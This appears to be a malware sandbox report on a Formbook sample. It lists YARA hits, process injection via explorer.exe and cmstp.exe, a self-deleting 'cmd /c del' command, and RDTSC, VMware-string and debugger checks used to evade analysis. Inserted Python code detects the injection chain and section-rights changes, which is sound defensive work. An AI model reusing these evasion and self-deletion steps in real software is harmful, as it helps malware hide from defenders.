Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@15/13
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File created: C:\Users\user\AppData\Local\Temp\nsf9EB.tmp
          Source: TazxfJHRhq.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: TazxfJHRhq.exe | VirusTotal: Detection: 14%
          Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File read: C:\Users\user\Desktop\TazxfJHRhq.exe
          Source: unknown | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
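The process-creation rows above are the part of this report most worth turning into a detection: the dropper is nowhere in the parent chain of cmstp.exe, because explorer.exe (injected) starts cmstp.exe, and cmstp.exe then runs cmd.exe /c del against the original sample. The following is an added example, not the sandbox's or the malware author's code; it generalizes the report's cmstp.exe case to any System32/SysWOW64 binary that explorer.exe starts with a bare command line. The records, the PIDs and the benign noise rows are constructed to mirror the rows above, and the field names (pid, ppid, image, cmdline) are an assumed Sysmon-style shape.

```python
"""Flag the injection chain the report shows: explorer.exe starts a bare
SysWOW64/System32 binary (here cmstp.exe), which runs cmd.exe /c del on the
dropper. Added example; the process records are constructed, PIDs included."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event ID 1 or an EDR equivalent)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# "/c del <path>.exe" with or without quotes around the path.
_DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?\.exe)['"]?\s*$""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def deleted_target(cmdline: str):
    """Path of the .exe a 'cmd /c del <path>' command line removes, else None."""
    m = _DEL_RE.search(cmdline)
    return m.group("target") if m else None


def is_bare_system_binary(ev: ProcEvent) -> bool:
    """True for a System32/SysWOW64 image whose command line is nothing but
    its own path, the way the report shows cmstp.exe being started."""
    image = ev.image.lower()
    if "\\windows\\system32\\" not in image and "\\windows\\syswow64\\" not in image:
        return False
    args = ev.cmdline.strip().strip("'\"").lower()
    return args in (image, basename(image))


def find_chains(events):
    """Return one dict per explorer.exe -> <bare system binary> -> cmd /c del chain,
    noting whether the deleted file is an image that executed in the same record set."""
    by_pid = {e.pid: e for e in events}
    executed = {e.image.lower() for e in events}
    hits = []
    for ev in events:
        if basename(ev.image) != "cmd.exe":
            continue
        target = deleted_target(ev.cmdline)
        host = by_pid.get(ev.ppid)
        if target is None or host is None or not is_bare_system_binary(host):
            continue
        launcher = by_pid.get(host.ppid)
        if launcher is None or basename(launcher.image) != "explorer.exe":
            continue
        hits.append({"host": host.image, "deleter_pid": ev.pid, "deleted": target,
                     "deleted_ran_earlier": target.lower() in executed})
    return hits


# Constructed records (all PIDs made up) mirroring the report's process rows,
# plus two benign rows that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(4212, 3100, r"C:\Users\user\Desktop\TazxfJHRhq.exe", r"'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(4220, 4212, r"C:\Users\user\Desktop\TazxfJHRhq.exe", r"'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(3100, 2800, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(5160, 3100, r"C:\Windows\SysWOW64\cmstp.exe", r"C:\Windows\SysWOW64\cmstp.exe"),
    ProcEvent(5284, 5160, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(5320, 5284, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6000, 3100, r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\notepad.exe"),
    ProcEvent(6100, 3100, r"C:\Windows\System32\cmstp.exe", r"cmstp.exe /s C:\temp\vpn.inf"),
    ProcEvent(6101, 6100, r"C:\Windows\System32\cmd.exe", r"cmd /c dir"),
]

if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print(hit)
```

The deleted path is the link back to the dropper: a tree view rooted at TazxfJHRhq.exe never reaches cmstp.exe, so the rule correlates on the image that cmd.exe deletes rather than on ancestry from the sample. A bare cmstp.exe is normally launched with an .inf argument, which is why the legitimate row with /s is excluded.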

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Unpacked PE file: 1.2.TazxfJHRhq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004059F2 push es; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041AE23 push ecx; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00414F4E pushad ; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004059F2 push es; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041AE23 push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0463D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041C828 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004059F2 push es; retf
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B46C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B402 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041C5C7 push dword ptr [2E33947Ah]; ret
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041AE23 push ecx; retf
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00414F4E pushad ; retf
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File created: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
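The "Detected unpacking" row compares section rights in E/R/W notation (.text:ER; .rdata:R; and so on) between the file on disk and what was later found in memory; that comparison comes straight from the IMAGE_SCN_MEM_EXECUTE / READ / WRITE bits of each IMAGE_SECTION_HEADER. The block below is an added example, not code from the sandbox or the report, that parses a PE section table into that notation and diffs two images. Both images are constructed fixtures built in code (only the headers the parser reads are populated), and the rights string here lists every set flag, so a read/write data section prints as RW where the report's row prints W.

```python
"""Parse a PE section table and render each section's memory rights in the
E/R/W notation the report uses, then diff an on-disk image against a dumped
in-memory copy. Added example; both images below are constructed in code."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def rights(characteristics: int) -> str:
    """Map IMAGE_SCN_MEM_* bits to the report's letters (E, R, W, in that order)."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if characteristics & IMAGE_SCN_MEM_READ else "") + \
           ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "")


def section_rights(image: bytes):
    """Return [(name, rights)] from the section headers of a PE32/PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]    # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]       # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                   # first IMAGE_SECTION_HEADER
    out = []
    for i in range(num_sections):
        name, *_, chars = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), rights(chars)))
    return out


def format_rights(sections) -> str:
    """'.text:ER;.rdata:R;...;' in the layout the report's row uses."""
    return "".join(f"{name}:{r};" for name, r in sections)


def rights_changes(before, after):
    """Sections whose rights differ between two images, as (name, old, new)."""
    old = dict(before)
    return [(name, old.get(name, "-"), r) for name, r in after if old.get(name) != r]


def wx_sections(sections):
    """Names of sections that are both writable and executable."""
    return [name for name, r in sections if "W" in r and "E" in r]


def build_pe(sections):
    """Build a minimal PE32 with the given [(name, characteristics)] section table.
    Only the fields the parser reads are populated; this is a fixture, not a loadable binary."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew -> PE header at 0x40
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    headers = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + coff + bytes(opt) + headers


# Constructed fixtures: rights as they sit in the file, and the same sections
# after an unpacker has made .text writable in order to patch it in place.
ON_DISK = [
    (".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".ndata", IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]
IN_MEMORY = [(".text", ON_DISK[0][1] | IMAGE_SCN_MEM_WRITE)] + ON_DISK[1:]

if __name__ == "__main__":
    disk, mem = section_rights(build_pe(ON_DISK)), section_rights(build_pe(IN_MEMORY))
    print(format_rights(disk), "vs", format_rights(mem))
    for name, old, new in rights_changes(disk, mem):
        print(f"{name}: {old} -> {new}")
    print("W+X sections:", wx_sections(mem))
```

Run it against a real sample by replacing build_pe(...) with the bytes of the file and of a process dump; a .text section that gains W, or any section that is both W and E, is the same signal the report's row encodes.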

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6060 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5400 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.232858915.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.488941796.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.233065923.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.225935087.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.233222059.00000000088C3000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_0267166E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_02671886 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h]
